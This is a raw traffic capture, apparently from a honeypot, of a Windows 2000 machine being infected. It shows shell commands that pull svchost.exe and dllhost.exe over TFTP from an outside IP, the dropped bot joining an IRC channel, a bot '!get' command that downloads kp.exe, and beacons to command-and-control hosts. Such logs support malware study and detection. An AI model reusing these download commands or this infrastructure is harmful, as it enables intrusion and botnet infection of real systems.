Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 98.175.169.158 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 98.175.169.158 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	Transfer successful: 29456 bytes in 4 seconds, 7364 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	tftp -i 98.175.169.158 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	Transfer successful: 19968 bytes in 3 seconds, 6656 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK zzetitueUSER w020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG zzetitue :!get http:/yigeshabi.8800.org:2012/kp.exe 
VICTIM:  	GET /kp.exe HTTP/1.0User-Agent: DownloadHost: yigeshabi.8800.org:2012Pragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2969FEDCEBCA8B5FF8F6CEDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=0.1932794 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /myck.jpg?t=0.7755091 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: russia.9966.org:2011Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=647ADC3890000CA801EC56676B2EE013970C9FFAAF8BFB37D4B27C399A32EEB2176EA245A19FB39F81BC79131A0A907A4F851FF6399B3E1B6752B0183D914B25304FC56CEBEEBD22A79D3A403CD2F827B0473508532DE2E4A90B630EB15944304513858FACB773DF982B2CAB1D1D31AB6E99C0EF5A1DCEE9E1B8C7A864D2922C2B2164C761525F9AB88A1E4A4C8D93EC&t=0.428692 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=6B75EA0E76E6AB0FB5580F3E4702B94A41DA84E1DCF85E926503185D58F080DC80F982652816270B8CB1A3C93828DE34F3390CE566C45B7EA491C068369A620C651A3B92C8CDE6796B51B3C908E671AE28DF9DA0255BC7C164C6731E44ACC6B28FD9B5BF756E913D56E52DBBE61FEE66748178265605EBD9CBDFC2B7CD6FC832B3A3D1748BBD11D192A645113EFF0B8FAC76&t=0.5621149 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-51-70-2B&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88 
ATTACKER:	GET /ck3.jpg?t=0.9535944 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: russia.9966.org:2011Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=425C1FFBE373B42B5BB7C5E9531878C7118FDFE69CB91F88D7E598DD852B623851289E845A1A6D5DCFA98EE392A8ED0013DFAC1AB0DF6B435B6FD8A067E7D8B39BE4BDC101CE69F60B314C3601EFA47BE11669540876BBBD60C2E489F51D1A6E1147AAA0504B3C9051E23DBAE9E9C2580BFC614EBCFBC6E1C79E187718AE6DD3E4EED1720131BB732112DD88D213AC28&t=0.9405329 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=1B052FCBFB6B31AEAC40163AB5FEF44BD7497D44092C9C0B3002B6F3D27C2B710A73DAC092D2A89898FE5F32B78D5CB1529EEC5A1D7241699BAF6B13D555B8D3A0DF601C25EA7AE583B97A00CF21D10EB94E685596E8080EB012EE83FF172054B6E03832554EC46816A56EF8EF167FF7847188D6B5E62D1FBBAF6411E143B04A647416B1032CE4243A0F7F27488ED4546C8C&t=0.4478571 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-51-70-2B&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck3.nucleardiscover.com:88 
ATTACKER:	GET / HTTP/1.0Accept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: voucherslunch.comConnection: Keep-Alive 
ATTACKER:	GET /ck4.jpg?t=0.8497888 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: russia.9966.org:2011Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /redirectExitTrack.php?d=voucherslunch.com&r=27&u=http%3A%2F%2Fas.casalemedia.com%2Fsd%3Fs%3D98198%26f%3D1 HTTP/1.0Accept: */*Referer: http:/voucherslunch.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: voucherslunch.comConnection: Keep-AliveCookie: GOSESSION=%7C1305661367.74%3A192.168.1.172%2C0; AAA=1 
ATTACKER:	GET /sd?s=98198&f=1 HTTP/1.0Accept: */*Referer: http:/voucherslunch.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Connection: Keep-AliveHost: as.casalemedia.com 
ATTACKER:	GET /sd?s=98198&f=1&C=1 HTTP/1.0Accept: */*Referer: http:/voucherslunch.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Cookie: CMID=@hfwjkPS1IgAAGW3B0UAAAA3; CMPS=091; CMPP=003Connection: Keep-AliveHost: as.casalemedia.com 
ATTACKER:	GET /vtrack.php?qry=6d7a499c8e5369692d26f5ba06ca4f110c116c501d86a15e09e5d35ef0d6fb54f7582902508e5c74d6d867fdb7d3183f HTTP/1.0Accept: */*Referer: http:/voucherslunch.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: voucherslunch.comConnection: Keep-AliveCookie: GOSESSION=%7C1305661367.74%3A192.168.1.172%2C0; AAA=1 
ATTACKER:	GET /nicheImages/270x26a/default.jpg HTTP/1.0Accept: */*Referer: http:/voucherslunch.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images.ddc.comConnection: Keep-Alive 
ATTACKER:	GET /nicheImages/60x22/default.jpg HTTP/1.0Accept: */*Referer: http:/voucherslunch.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images.ddc.comConnection: Keep-Alive 
ATTACKER:	GET /nicheImages/270x26b/default.jpg HTTP/1.0Accept: */*Referer: http:/voucherslunch.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images.ddc.comConnection: Keep-Alive 
ATTACKER:	GET /nicheImages/498x257/55.jpg HTTP/1.0Accept: */*Referer: http:/voucherslunch.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images.ddc.comConnection: Keep-Alive 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu